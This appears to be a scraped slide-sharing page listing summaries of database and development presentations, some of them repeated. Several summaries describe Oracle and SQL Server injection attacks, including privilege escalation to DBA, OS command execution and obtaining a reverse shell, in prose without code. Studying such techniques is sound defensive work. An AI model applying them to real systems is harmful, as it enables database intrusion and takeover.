These are the slides from the defcon talk title 'The making of 2nd sql injection worm'. Refer to the video presentations uploaded on www.notsosecure.com.
The document discusses calling user-defined functions within SQL statements. It notes that functions may be called multiple times depending on the structure of the SQL statement. Functions in the SELECT and WHERE clauses of a query will be called independently for each row. Functions in an ORDER BY clause may also be called twice if an inline view or view is used due to query rewrite. The number of function calls can be tracked using a package to inspect execution.
Hidden Gems of Performance Tuning: Hierarchical Profiler and DML Trigger Opti...Michael Rosenblum
In any large ecosystem, there are always areas that stay in the twilight, outside of the public’s attention. This deep dive attempts to change the trend regarding two, at first glance, unrelated PL/SQL topics: hierarchical profiler (HProf) and database triggers. But if you look closer, there’s something in common: they’re significantly underused! HProf because nobody heard about it, database triggers because of decades-old stigma. Let’s put both of them back into our development toolset!
Part #1. One of the most critical FREE SQL and PL/SQL performance tuning tools is almost totally unknown! If you ask, how much time is spent on routine A? How often is function B called? Most developers would hand-code something instead of using the Oracle PL/SQL HProf. This isn’t because the provided functionality is disliked, but because developers aren’t aware of its existence! This presentation is an attempt to alter this trend and reintroduce HProf to a wider audience.
Part #2. There isn’t anything “evil” about database triggers; they just have to be used where they can actually solve problems. In this presentation, various kinds of triggers will be examined from a global system optimization view, including tradeoffs between multiple goals (e.g., depending upon the available hardware, developers can select either CPU-intensive or I/O-intensive solutions). This presentation will focus on the most common performance problems related to different kinds of DML triggers and the proper ways of resolving them.
Flexviews is a materialized view solution for MySQL. This set of slides introduces Flexviews concepts, and gives some examples in how to use it and what to use it for.
The document discusses views in Oracle databases and how they have evolved beyond simple stored SQL queries. Views can now serve as an isolation layer between applications and tables, accept DML operations directly or through triggers, and include complex functionality through features like parameterized conditions, dynamic SQL, and INSTEAD OF triggers. The document outlines techniques for optimizing DML operations on views, such as using dynamic SQL to only update changed columns, and leveraging compound triggers for shared program logic. It also warns of performance issues that can arise from logical primary keys on views.
Data Tracking: On the Hunt for Information about Your DatabaseMichael Rosenblum
Behind the scenes, Oracle databases hide a myriad of processes to ensure that your data can be safely stored and retrieved. These processes also leave “tracks” (or they COULD leave tracks if you set them up properly). These tracks, together with application-specific data, create a complete representation of the system’s day-to-day activity. Too often this representation is lost at the DBA/Developer borderline, mostly because one side is not aware of the needs of the other. This presentation strives to bridge this gap. It focuses on key sources of database information and techniques that are useful for both DBAs and developers:
- Data Dictionary
- Oracle Logging
- Oracle Tracing
- Advanced code instrumentation
This document provides information about installing and using the Firebird RDBMS, including:
- The two main types of Firebird servers and how to start/stop the Superserver.
- Default username and password for administration, and how to add/modify user accounts.
- Using the isql tool to connect to databases and execute SQL statements.
- Basic troubleshooting for common errors.
- Security measures like logging login attempts and restricting access after failed logins.
- Using the GBAK tool to backup and restore entire Firebird databases.
This document discusses techniques for detecting and preventing SQL injection using the Percona Toolkit and Noinject!. It begins by introducing SQL injection and how attackers can modify SQL queries without changing server code. It then discusses using query fingerprints to detect new queries that may indicate injection attempts. The Percona Toolkit tools pt-query-digest and pt-fingerprint are used to generate and store fingerprints in a whitelist. Pt-query-digest can detect new fingerprints that have not been reviewed. The Noinject! proxy script uses fingerprints to inspect queries in real-time and block any that do not match whitelisted patterns. The document concludes by discussing limitations and ways to improve the fingerprinting approach.
When performance issues arise, developers often blame the database, while DBAs are quick to blame developers. If all else fails, the network is the culprit. Most systems have many parts managed by multiple entities within an organization. This session explores how to improve system quality by proper monitoring of user activity rather than server activity. Without an overall architectural approach to performance tuning, any aggregated statistics (CPU workload, communication speed, network latency, etc.) are meaningless unless you can explain to a user why a button click takes so much time. This session offers a coherent methodology for identifying performance issues, pinpointing common problem sources, and providing solutions.
The document discusses calling user-defined functions within SQL statements. It notes that functions may be called multiple times depending on the structure of the SQL statement. Functions in the SELECT and WHERE clauses of a query will be called independently for each row. Functions in an ORDER BY clause may also be called twice if an inline view or view is used due to query rewrite. The number of function calls can be tracked using a package to inspect execution.
Hidden Gems of Performance Tuning: Hierarchical Profiler and DML Trigger Opti...Michael Rosenblum
In any large ecosystem, there are always areas that stay in the twilight, outside of the public’s attention. This deep dive attempts to change the trend regarding two, at first glance, unrelated PL/SQL topics: hierarchical profiler (HProf) and database triggers. But if you look closer, there’s something in common: they’re significantly underused! HProf because nobody heard about it, database triggers because of decades-old stigma. Let’s put both of them back into our development toolset!
Part #1. One of the most critical FREE SQL and PL/SQL performance tuning tools is almost totally unknown! If you ask, how much time is spent on routine A? How often is function B called? Most developers would hand-code something instead of using the Oracle PL/SQL HProf. This isn’t because the provided functionality is disliked, but because developers aren’t aware of its existence! This presentation is an attempt to alter this trend and reintroduce HProf to a wider audience.
Part #2. There isn’t anything “evil” about database triggers; they just have to be used where they can actually solve problems. In this presentation, various kinds of triggers will be examined from a global system optimization view, including tradeoffs between multiple goals (e.g., depending upon the available hardware, developers can select either CPU-intensive or I/O-intensive solutions). This presentation will focus on the most common performance problems related to different kinds of DML triggers and the proper ways of resolving them.
Flexviews is a materialized view solution for MySQL. This set of slides introduces Flexviews concepts, and gives some examples in how to use it and what to use it for.
The document discusses views in Oracle databases and how they have evolved beyond simple stored SQL queries. Views can now serve as an isolation layer between applications and tables, accept DML operations directly or through triggers, and include complex functionality through features like parameterized conditions, dynamic SQL, and INSTEAD OF triggers. The document outlines techniques for optimizing DML operations on views, such as using dynamic SQL to only update changed columns, and leveraging compound triggers for shared program logic. It also warns of performance issues that can arise from logical primary keys on views.
Data Tracking: On the Hunt for Information about Your DatabaseMichael Rosenblum
Behind the scenes, Oracle databases hide a myriad of processes to ensure that your data can be safely stored and retrieved. These processes also leave “tracks” (or they COULD leave tracks if you set them up properly). These tracks, together with application-specific data, create a complete representation of the system’s day-to-day activity. Too often this representation is lost at the DBA/Developer borderline, mostly because one side is not aware of the needs of the other. This presentation strives to bridge this gap. It focuses on key sources of database information and techniques that are useful for both DBAs and developers:
- Data Dictionary
- Oracle Logging
- Oracle Tracing
- Advanced code instrumentation
This document provides information about installing and using the Firebird RDBMS, including:
- The two main types of Firebird servers and how to start/stop the Superserver.
- Default username and password for administration, and how to add/modify user accounts.
- Using the isql tool to connect to databases and execute SQL statements.
- Basic troubleshooting for common errors.
- Security measures like logging login attempts and restricting access after failed logins.
- Using the GBAK tool to backup and restore entire Firebird databases.
This document discusses techniques for detecting and preventing SQL injection using the Percona Toolkit and Noinject!. It begins by introducing SQL injection and how attackers can modify SQL queries without changing server code. It then discusses using query fingerprints to detect new queries that may indicate injection attempts. The Percona Toolkit tools pt-query-digest and pt-fingerprint are used to generate and store fingerprints in a whitelist. Pt-query-digest can detect new fingerprints that have not been reviewed. The Noinject! proxy script uses fingerprints to inspect queries in real-time and block any that do not match whitelisted patterns. The document concludes by discussing limitations and ways to improve the fingerprinting approach.
When performance issues arise, developers often blame the database, while DBAs are quick to blame developers. If all else fails, the network is the culprit. Most systems have many parts managed by multiple entities within an organization. This session explores how to improve system quality by proper monitoring of user activity rather than server activity. Without an overall architectural approach to performance tuning, any aggregated statistics (CPU workload, communication speed, network latency, etc.) are meaningless unless you can explain to a user why a button click takes so much time. This session offers a coherent methodology for identifying performance issues, pinpointing common problem sources, and providing solutions.
How to export import a mysql database via ssh in aws lightsail wordpress rizw...AlexRobert25
Suppose you want a database backup of any instances ‘ in AWS Lightsail WordPress ‘ through putty or SSH. For that, first, we need to create an instance
IEEE Day 2013 Oracle Database 12c: new features for developersRamin Orujov
Ramin Orujov gave a presentation on new features in Oracle Database 12c for developers. He discussed new SQL features like using sequences as default column values, identity columns supporting 32K limits for VARCHAR2 and NVARCHAR2 data types, and LIMIT and OFFSET for paging. New PL/SQL features included returning result sets from procedures, modularity with the ACCESSIBLE BY clause, and result caching for invoker rights functions. For Java, the presentation covered PL/SQL boolean support in JDBC and package-level collection support.
Managing Unstructured Data: Lobs in the World of JSONMichael Rosenblum
This document discusses managing unstructured JSON data in Oracle databases. It describes how a company initially stored JSON files in VARCHAR2 columns, but then the files grew larger than 4000 characters requiring a change to CLOB storage. This change caused issues until developers understood that CLOBs have different access, storage, and processing mechanisms compared to VARCHAR2. The document provides an overview of CLOB architecture including data access, internal storage, caching, logging, and indexing. It emphasizes that properly understanding CLOBs is important when storing and manipulating JSON data in Oracle databases.
Probably everyone has heard about reactive programming but not everyone tried to use it in real projects.
This presentation is about reactive approach basics and about own experience of integrating this approach into real Android project step by step.
The document discusses performance testing of an API server. It provides details on:
1) Preparing for performance testing by generating test data and configuring tools like Artillery to simulate user traffic.
2) Conducting the performance tests on different server configurations to identify bottlenecks, including testing with different Node.js versions.
3) Analyzing the results of the performance tests by profiling requests and examining response times to further optimize the server performance.
By using specially crafted parameters in double quotes, it is possible to bypass the input validation of the Oracle dbms_assert package and inject SQL code. This allows dozens of already patched Oracle vulnerabilities to be exploited again across versions 8.1.7.4 to 10.2.0.2. The researcher notified Oracle of the problem in April 2006. To mitigate risks, privileges like CREATE PROCEDURE should be revoked to prevent injection of malicious functions or procedures.
Процесс разработки не начинается и не заканчивается на написании кода программного продукта. Мы пишем документацию, придумываем, как это всё оттестировать, и заботимся о том, чтобы доступность приложения была на высоком уровне.
Мы все делаем привычные вещи привычным для нас способом. Порой выполняя много ручной и неэффективной работы. Но что, если есть другой, радикальный подход. Можно ли формализовать свою деятельность и переложить её в код? Какие практики и инструменты для этого использовать?
В докладе будет представлен личный опыт автора по автоматизации различных элементов разработки ПО.
The document summarizes Oracle Cloud services including Platform as a Service (PaaS), Infrastructure as a Service (IaaS), and Software as a Service (SaaS). It provides an overview of Oracle database, middleware, and engineered systems available on Oracle Cloud. It also discusses how to create a database on Oracle Cloud using REST APIs and cURL, and how to perform RMAN backups to Oracle Cloud Storage. Finally, it covers connecting to databases on Oracle Cloud using Enterprise Manager and SQL Developer.
1) The document discusses Oracle database auditing features before and after version 12.1. It describes migrating the audit trail to the unified audit trail and using the SYS.UNIFIED_AUDIT_TRAIL table.
2) It provides steps to configure syslog auditing on Linux for Oracle database audit records. Procedures are created to output messages to syslog and call it from a fine-grained auditing policy handler.
3) An example fine-grained auditing policy is created to audit access to the SECDEMO.CUSTOMER table and call the syslog handler for non-application users.
This document contains a summary of JavaScript features introduced in ES6 and later versions by Janghyun Han. It discusses features such as variables, arrow functions, template literals, classes, modules, promises, and generators. For each feature, it provides code examples to demonstrate usage and differences from earlier JavaScript versions. The document aims to help readers learn about modern JavaScript language improvements.
Docker on a local machine and Docker in production — are two big differences. It's easy to play with technology but it's hard to do something real for many customers.
Half a year ago inside of Alpha Laboratory (division of Alfa-Bank) we've started building new microservices architecture for one of our pilot projects. We've almost completely changed a stack of the used technologies on a frontend and significantly changed it on a middle layer. For package and distribution we have choosen Docker. Two months ago we've deployed project to production and have opened service for clients.
In the report the following topics will be covered:
- reasons of a choice Docker;
- why Docker without other tools is not enough for a production;
- what stack of technologies we used in our solution;
- what advantages we've got;
- what problems have been faced and how we've solved them.
PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOpsAndrey Karpov
The document discusses integrating the PVS-Studio static code analyzer with Azure DevOps and Chocolatey. It provides steps to configure a build pipeline in Azure DevOps to install PVS-Studio using Chocolatey, run analysis on a project, and publish the results. The analysis found several potential bugs in the Chocolatey code including logical errors, redundant checks, and null reference issues. Integrating PVS-Studio with these tools helps improve code quality.
This document discusses Fork/Join framework in Java 7. It explains that Fork/Join is designed to maximize usage of multiple processors by recursively splitting large tasks into smaller subtasks. It uses work-stealing algorithm where idle workers can steal tasks from busy workers' queues to balance load. An example of calculating Fibonacci numbers using Fork/Join is provided where the task is split recursively until the subproblem size is smaller than threshold, at which point it is computed directly.
This document summarizes new features in JDK 7 including updates to XML stack, JDBC, RowSet, class loading, JVM performance improvements, garbage collection, I/O, graphics APIs, collections, and strict class file checking. It also previews planned features for JDK 8 such as support for modular programming, annotations, collections improvements, lambda expressions, and modularization.
This document provides a summary of Han Janghyun's background and experience. It includes:
1. Han Janghyun previously worked as a senior developer at Samsung SDS and has experience implementing TV platform JavaScript applications and retail solution servers and frontends.
2. He now works as a freelance developer and operates the blog han41858.tistory.com. He is also writing a translation of the book Angular 2.
3. Han Janghyun is also involved in operating GDG Korea Web Tech.
The document discusses unit testing and provides examples of writing unit tests in PHP using the PHPUnit framework. It explains what unit tests are, why they are useful for finding and preventing bugs, and different types of tests. It also demonstrates how to write tests for a "slugify" string method, use data providers to reduce duplicated code, and mock objects to test code in isolation without external dependencies like databases. The document advocates for test-driven development by writing tests before code. It also mentions how to integrate tests with version control using hooks and generate code coverage reports.
The document discusses Spring and Hibernate frameworks. It provides an overview of Hibernate's object-relational mapping capabilities and how it can be used to map Java objects to database tables. It also describes Spring's inversion of control and dependency injection features. The document outlines how Spring and Hibernate can be integrated together for data access in applications. It provides examples of configuration, transaction management, and security integration between the two frameworks.
This document discusses ORM injection vulnerabilities using Hibernate and MySQL as an example. It begins with an introduction to injection vulnerabilities and ORM concepts. It then demonstrates how SQL injection is possible by exploiting differences in escaping rules between HQL and MySQL. A proof of concept shows injecting HQL to retrieve all records, and injecting SQL directly by escaping quotes differently. The document concludes that input validation and parameterized queries are needed to prevent ORM injection, and frameworks may not fully prevent injection depending on the underlying database.
1) The document describes a Spring Boot RESTful web service example that retrieves data from an Oracle table and returns it as a JSON response. It also returns a single record as an object mapped to JSON based on searching by name.
2) Jackson library and @RestController annotation are used to return the response as JSON instead of using JSP.
3) The name parameter is passed in the URL path instead of as a parameter, and is used to query the database and return the matching data as a JSON response.
How to export import a mysql database via ssh in aws lightsail wordpress rizw...AlexRobert25
Suppose you want a database backup of any instances ‘ in AWS Lightsail WordPress ‘ through putty or SSH. For that, first, we need to create an instance
IEEE Day 2013 Oracle Database 12c: new features for developersRamin Orujov
Ramin Orujov gave a presentation on new features in Oracle Database 12c for developers. He discussed new SQL features like using sequences as default column values, identity columns supporting 32K limits for VARCHAR2 and NVARCHAR2 data types, and LIMIT and OFFSET for paging. New PL/SQL features included returning result sets from procedures, modularity with the ACCESSIBLE BY clause, and result caching for invoker rights functions. For Java, the presentation covered PL/SQL boolean support in JDBC and package-level collection support.
Managing Unstructured Data: Lobs in the World of JSONMichael Rosenblum
This document discusses managing unstructured JSON data in Oracle databases. It describes how a company initially stored JSON files in VARCHAR2 columns, but then the files grew larger than 4000 characters requiring a change to CLOB storage. This change caused issues until developers understood that CLOBs have different access, storage, and processing mechanisms compared to VARCHAR2. The document provides an overview of CLOB architecture including data access, internal storage, caching, logging, and indexing. It emphasizes that properly understanding CLOBs is important when storing and manipulating JSON data in Oracle databases.
Probably everyone has heard about reactive programming but not everyone tried to use it in real projects.
This presentation is about reactive approach basics and about own experience of integrating this approach into real Android project step by step.
The document discusses performance testing of an API server. It provides details on:
1) Preparing for performance testing by generating test data and configuring tools like Artillery to simulate user traffic.
2) Conducting the performance tests on different server configurations to identify bottlenecks, including testing with different Node.js versions.
3) Analyzing the results of the performance tests by profiling requests and examining response times to further optimize the server performance.
By using specially crafted parameters in double quotes, it is possible to bypass the input validation of the Oracle dbms_assert package and inject SQL code. This allows dozens of already patched Oracle vulnerabilities to be exploited again across versions 8.1.7.4 to 10.2.0.2. The researcher notified Oracle of the problem in April 2006. To mitigate risks, privileges like CREATE PROCEDURE should be revoked to prevent injection of malicious functions or procedures.
Процесс разработки не начинается и не заканчивается на написании кода программного продукта. Мы пишем документацию, придумываем, как это всё оттестировать, и заботимся о том, чтобы доступность приложения была на высоком уровне.
Мы все делаем привычные вещи привычным для нас способом. Порой выполняя много ручной и неэффективной работы. Но что, если есть другой, радикальный подход. Можно ли формализовать свою деятельность и переложить её в код? Какие практики и инструменты для этого использовать?
В докладе будет представлен личный опыт автора по автоматизации различных элементов разработки ПО.
The document summarizes Oracle Cloud services including Platform as a Service (PaaS), Infrastructure as a Service (IaaS), and Software as a Service (SaaS). It provides an overview of Oracle database, middleware, and engineered systems available on Oracle Cloud. It also discusses how to create a database on Oracle Cloud using REST APIs and cURL, and how to perform RMAN backups to Oracle Cloud Storage. Finally, it covers connecting to databases on Oracle Cloud using Enterprise Manager and SQL Developer.
1) The document discusses Oracle database auditing features before and after version 12.1. It describes migrating the audit trail to the unified audit trail and using the SYS.UNIFIED_AUDIT_TRAIL table.
2) It provides steps to configure syslog auditing on Linux for Oracle database audit records. Procedures are created to output messages to syslog and call it from a fine-grained auditing policy handler.
3) An example fine-grained auditing policy is created to audit access to the SECDEMO.CUSTOMER table and call the syslog handler for non-application users.
This document contains a summary of JavaScript features introduced in ES6 and later versions by Janghyun Han. It discusses features such as variables, arrow functions, template literals, classes, modules, promises, and generators. For each feature, it provides code examples to demonstrate usage and differences from earlier JavaScript versions. The document aims to help readers learn about modern JavaScript language improvements.
Docker on a local machine and Docker in production — are two big differences. It's easy to play with technology but it's hard to do something real for many customers.
Half a year ago inside of Alpha Laboratory (division of Alfa-Bank) we've started building new microservices architecture for one of our pilot projects. We've almost completely changed a stack of the used technologies on a frontend and significantly changed it on a middle layer. For package and distribution we have choosen Docker. Two months ago we've deployed project to production and have opened service for clients.
In the report the following topics will be covered:
- reasons of a choice Docker;
- why Docker without other tools is not enough for a production;
- what stack of technologies we used in our solution;
- what advantages we've got;
- what problems have been faced and how we've solved them.
PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOpsAndrey Karpov
The document discusses integrating the PVS-Studio static code analyzer with Azure DevOps and Chocolatey. It provides steps to configure a build pipeline in Azure DevOps to install PVS-Studio using Chocolatey, run analysis on a project, and publish the results. The analysis found several potential bugs in the Chocolatey code including logical errors, redundant checks, and null reference issues. Integrating PVS-Studio with these tools helps improve code quality.
This document discusses Fork/Join framework in Java 7. It explains that Fork/Join is designed to maximize usage of multiple processors by recursively splitting large tasks into smaller subtasks. It uses work-stealing algorithm where idle workers can steal tasks from busy workers' queues to balance load. An example of calculating Fibonacci numbers using Fork/Join is provided where the task is split recursively until the subproblem size is smaller than threshold, at which point it is computed directly.
This document summarizes new features in JDK 7 including updates to XML stack, JDBC, RowSet, class loading, JVM performance improvements, garbage collection, I/O, graphics APIs, collections, and strict class file checking. It also previews planned features for JDK 8 such as support for modular programming, annotations, collections improvements, lambda expressions, and modularization.
This document provides a summary of Han Janghyun's background and experience. It includes:
1. Han Janghyun previously worked as a senior developer at Samsung SDS and has experience implementing TV platform JavaScript applications and retail solution servers and frontends.
2. He now works as a freelance developer and operates the blog han41858.tistory.com. He is also writing a translation of the book Angular 2.
3. Han Janghyun is also involved in operating GDG Korea Web Tech.
The document discusses unit testing and provides examples of writing unit tests in PHP using the PHPUnit framework. It explains what unit tests are, why they are useful for finding and preventing bugs, and different types of tests. It also demonstrates how to write tests for a "slugify" string method, use data providers to reduce duplicated code, and mock objects to test code in isolation without external dependencies like databases. The document advocates for test-driven development by writing tests before code. It also mentions how to integrate tests with version control using hooks and generate code coverage reports.
The document discusses Spring and Hibernate frameworks. It provides an overview of Hibernate's object-relational mapping capabilities and how it can be used to map Java objects to database tables. It also describes Spring's inversion of control and dependency injection features. The document outlines how Spring and Hibernate can be integrated together for data access in applications. It provides examples of configuration, transaction management, and security integration between the two frameworks.
This document discusses ORM injection vulnerabilities using Hibernate and MySQL as an example. It begins with an introduction to injection vulnerabilities and ORM concepts. It then demonstrates how SQL injection is possible by exploiting differences in escaping rules between HQL and MySQL. A proof of concept shows injecting HQL to retrieve all records, and injecting SQL directly by escaping quotes differently. The document concludes that input validation and parameterized queries are needed to prevent ORM injection, and frameworks may not fully prevent injection depending on the underlying database.
1) The document describes a Spring Boot RESTful web service example that retrieves data from an Oracle table and returns it as a JSON response. It also returns a single record as an object mapped to JSON based on searching by name.
2) Jackson library and @RestController annotation are used to return the response as JSON instead of using JSP.
3) The name parameter is passed in the URL path instead of as a parameter, and is used to query the database and return the matching data as a JSON response.
DefCon 2012 - Near-Field Communication / RFID Hacking - LeeMichael Smith
This document summarizes Eddie Lee's presentation on NFC hacking at DEFCON 20. It introduces the NFCProxy tool, which allows analyzing NFC protocols by proxying transactions between an NFC reader and card. The tool works by relaying APDUs between the two devices over WiFi. It can save, export, and replay transactions. The presentation demonstrates using NFCProxy in proxy mode to observe live transactions and in replay mode to simulate card behaviors. Future work may include generic frameworks for different NFC technologies and fuzzing NFC protocols.
This document summarizes Black Hat and Defcon, two annual cybersecurity conferences held in Las Vegas. Black Hat is a more professional conference focused on training with over 9,000 attendees. Defcon is larger with nearly 16,000 attendees and has a hacker culture focused on unconventional security research. Both conferences feature talks on a wide range of topics from automotive hacking to Windows exploits to credit card fraud. Defcon in particular has talks known for being unrecorded with "no sobriety" at related events.
The document discusses the art of trolling and defines it as "fuzzing someone else's mind with the express purpose of laughing so hard you squirt 30 year old single malt through your nose." It provides various definitions of trolling from dictionaries and references ancient gods and figures as "prolific ante-internet trolls." The document also discusses using behavior modification techniques for trolling and developing technology like bots to enhance trolling abilities.
This is an ongoing course at McGill university on Electronic marketplaces and social media
The 3rd session discusses building websites and best practices
SQL injection attacks pose a major security threat by allowing attackers to alter intended database queries or commands through injection of malicious SQL code. Effective defenses include whitelisting input, escaping special characters, and using prepared statements with bind variables to separate data from SQL commands. These techniques help prevent attacks that could compromise user data, modify critical database information, or grant unauthorized access to attackers.
Give Me Three Things: Anti-Virus Bypass Made EasySecurity Weekly
The document discusses three common issues that allow attackers to be successful even with simple techniques: 1) a focus on novel attacks instead of basics, 2) reliance on blacklist-based antivirus, and 3) an oversimplified view of users as "dumb" rather than recognizing sophisticated social engineering. It argues organizations should instead focus on detecting attacker impact, moving away from blacklist security, and implementing controls and user training to limit damage from mistakes or successful attacks.
New techniques in sql obfuscation, from DEFCON 20Nick Galbreath
This document summarizes a presentation on new SQL injection obfuscation techniques. It provides details on the speaker, Nick Galbreath, and the event: DEFCON 20 in Las Vegas on July 27, 2012. It then discusses libinjection, a tool for detecting SQLi, and analyses it on 32,000 SQLi attacks to find syntax not previously seen. The rest of the document explores unusual and underexploited SQL syntax related to numbers, comments, strings, and data types that could be useful for fuzzing, validation, and obfuscation.
SQL injection is a type of attack where malicious SQL code is injected into an application's database query, potentially exposing or modifying private data. Attackers can bypass logins, access secret data, modify website contents, or shut down databases. SQL injection occurs when user input is not sanitized before being used in SQL queries. Attackers first find vulnerable websites, then check for errors to determine the number of columns. They use "union select" statements to discover which columns are responsive to queries, allowing them to extract data like user credentials or database contents. Developers should sanitize all user inputs to prevent SQL injection attacks.
This document discusses a password collection called W3@|cP@$s. It contains dictionaries of passwords gathered from multiple sources on the internet. The document provides statistics on the number and types of passwords collected, such as the frequency of different character sets and length distributions. It also describes the features of the collection, including the ability to filter passwords, count totals, and check sample passwords. The collection contains over 3.5 billion passwords gathered using automated bots to find password dumps from sites like pastebin.com.
This document outlines how to remotely hack Windows 95 without any user interaction or needing zero-day exploits. It lists the prerequisites as having a default installation of Windows 95 with a writable C: share and network connectivity configured. It then provides links to resources on hacking Windows 95, including a 158-page manual and blog posts walking through exploiting vulnerabilities. The goal is to achieve remote code execution on the target system using existing hacking tools.
Kontrollimi Teknik I Automjeteve Te LehtaBesart Vllasa
Punimi i temes se diplomes per kryerjen e shkolles se mesme te larte profesionale.
Kontrollimi teknik i automjeteve te lehta transportuese deri ne 3.5t.
DEFCON17 - Your Mind: Legal Status, Rights and Securing YourselfJames Arlen
James Arlen and Tiffany Rad
As a participant in the information economy, you no longer exclusively own material originating from your organic brain; you leave a digital trail with your portable device's transmitted communications and when your image is captured by surveillance cameras. Likewise, if you Tweet or blog, you have outsourced a large portion of your memory and some of your active cognition to inorganic systems. U.S. and International laws relating to protection of intellectual property and criminal search and seizure procedures puts into question protections of these ephemeral communications and memoranda stored on your personal computing devices, in cloud computing networks, on off-shore "subpoena proof" server platforms, or on social networking sites.
Although once considered to be futuristic technologies, as we move our ideas and memories onto external devices or are subjected to public surveillance with technology (Future Attribute Screening Technology) that assesses pre-crime thoughts by remotely measuring biometric data such as heart rate, body temperature, pheromone responses, and respiration, where do our personal privacy rights to our thoughts end and, instead, become public expressions with lesser legal protections? Similarly, at what state does data in-transit or stored in implantable medical devices continuously connected to the Internet become searchable? In a society in which there is little differentiation remaining between self/computer, thoughts/stored memoranda, and international boundaries, a technology lawyer/computer science professor and a security professional will recommend propositions to protect your data and yourself.
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where you have deployed a malware on a user’s workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user’s workstation.
I developed (and will publish) two tools that help you in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help you to circumvent the hardware firewall after we can execute code on the server with admin privileges (using a signed kernel driver). My tools are generic meaning that they work against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops. The number of problems you can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
This document describes a new method for exploiting PL/SQL injection without needing to create functions or procedures. It involves injecting a pre-compiled cursor using the DBMS_SQL package to execute arbitrary SQL. The attacker can use this to grant privileges to themselves or create their own functions without any system privileges beyond CREATE SESSION. It provides an example exploiting the SDO_DROP_USER_BEFORE trigger in Oracle to gain DBA privileges in this way without needing CREATE PROCEDURE permission.
New and improved hacking oracle from web apps sumit sidharthowaspindia
This document discusses hacking Oracle databases from web applications. It describes how SQL injection vulnerabilities in web apps connected to Oracle databases can be used to escalate privileges and execute operating system commands. Specifically, it outlines how the dbms_xmlquery.newcontext() and dbms_xmlquery.getxml() functions allow executing arbitrary PL/SQL, which can then exploit other vulnerabilities to gain DBA access privileges and run operating system code. Examples are provided that demonstrate exploiting vulnerabilities to gain DBA privileges and executing Metasploit payloads on the database server.
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
Learn what is SQL injection, how to use prepared statements, how to escape and write secure stored procedures. Many PHP projects are covered - PDO, Propel, Doctrine, Zend Framework and MDB2. Multiple gotchas included.
This document provides an agenda and overview for a talk on exploiting SQL injections from web applications against Oracle databases. The talk covers topics like PL/SQL vs SQL injection, extracting data, privilege escalation, OS code execution, second order attacks, and tools for exploitation like Bsqlbf. It discusses challenges like limitations of SQL in Oracle and lack of documentation. Examples are provided for various exploits like using DBMS_EXPORT_EXTENSION and DBMS_JAVA_TEST functions to escalate privileges or execute OS commands.
Oracle Database 12c - New Features for Developers and DBAsAlex Zaballa
Oracle Database 12c includes over 500 new features designed to support cloud computing, big data, security, and availability. Key features include support for up to 4096 pluggable databases, hot cloning without placing the source database in read-only mode, sharding capabilities, in-memory column storage, application containers, improved resource management isolation, and AWR support on Active Data Guard databases. Other notable features include enhanced JSON support, data redaction for security, row limits and offsets for queries, invisible columns, SQL text expansion, PL/SQL from SQL, session-level sequences, extended data types up to 32K, multiple indexes on the same columns, READ privileges without row locking ability, session private statistics for global temporary tables,
Oracle Database 12c - New Features for Developers and DBAsAlex Zaballa
This document summarizes a presentation about new features in Oracle Database 12c for developers and DBAs. It introduces JSON support, data redaction, SQL query row limits and offsets, invisible columns, extended data types, session level sequences, and more. Demo sections are included to illustrate several of the new features.
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)Igor Bronovskyy
09 - Express Nodes on the right Angle - Vitaliy Basyuk - IT Event 2013 (5)
60 вузлів під правильним кутом - миттєва розробка програмних додатків використовуючи Node.js + Express + MongoDB + AngularJS.
Коли ми беремось за новий продукт, передусім ми думаємо про пристрасть, яка необхідна йому, щоб зробити користувача задоволеним і відданим нашому баченню. А що допомагає нам здобути прихильність користувачів? Очевидно, що окрім самої ідеї, також важлими будуть: зручний користувацький інтерфейс, взаємодія в реальному часі та прозора робота з даними. Ці три властивості ми можемо здобути використовучи ті чи інші засоби, проте, коли все лиш починається, набагато зручніше, якщо інструменти допомагають втілити бажане, а не відволікають від головної мети.
Ми розглянемо процес розробки, використовуючи Node.js, Express, MongoDB та AngularJS як найбільш корисного поєднання для отримання вагомої переваги вже на старті вашого продукту.
Віталій Басюк
http://itevent.if.ua/lecture/express-nodes-right-angle-rapid-application-development-using-nodejs-express-mongodb-angular
The document provides an overview of structured query language (SQL) and SQL injection. It discusses SQL queries including SELECT, INSERT, UPDATE, DELETE statements. It also covers identifying the database platform, combining rows, SQL injection cheat sheets, bypassing input validation filters, and troubleshooting SQL injection attacks on various platforms including PostgreSQL, DB2, Informix and Ingres.
SAP strikes back Your SAP server now counter attacks.Dmitry Iudin
In this presentation, we will demonstrate how attackers can compromise all SAP clients and gain private information from their machines by using the SAP server.
This document discusses how to protect databases from SQL injection vulnerabilities by fuzz testing databases to find vulnerabilities before hackers do. It covers common SQL injection techniques like in-band and out-of-band injection. It then describes how to build a custom fuzzer using PL/SQL to fuzz test databases, track results, discover vulnerable code, invoke code with test parameters, and report findings. The document demonstrates how fuzz testing can find real vulnerabilities and provides examples of an interface and secure coding techniques to help prevent vulnerabilities.
One Click Provisioning With Enterprise Manager 12cJosh Turner
Enterprise Manager 12c can provision a new WebLogic environment in less than 30 minutes. The presentation watched a live demo of provisioning a fully functional WebLogic instance on a clean Oracle Linux install. It covered preparing the host, adding it to Enterprise Manager, provisioning the environment using a gold image, and customizing the provisioning process to automatically install prerequisites and restart services. Behind the scenes, it uses provisioning profiles based on golden images, scripts like preinstall.sh to copy files and install packages, and directives to define the provisioning process.
This document provides instructions on how to use SQL injection to execute operating system commands on a Microsoft SQL Server and retrieve a reverse shell within 30 minutes of a penetration test. It demonstrates exploiting SQL injection to execute a VBScript that downloads and executes a binary, providing remote code execution on the system through a reverse shell. Tricks are discussed like using VBPacker to obfuscate the payload and bypass outbound filtering. The ability to leverage this technique through other vulnerabilities like CSRF is also mentioned.
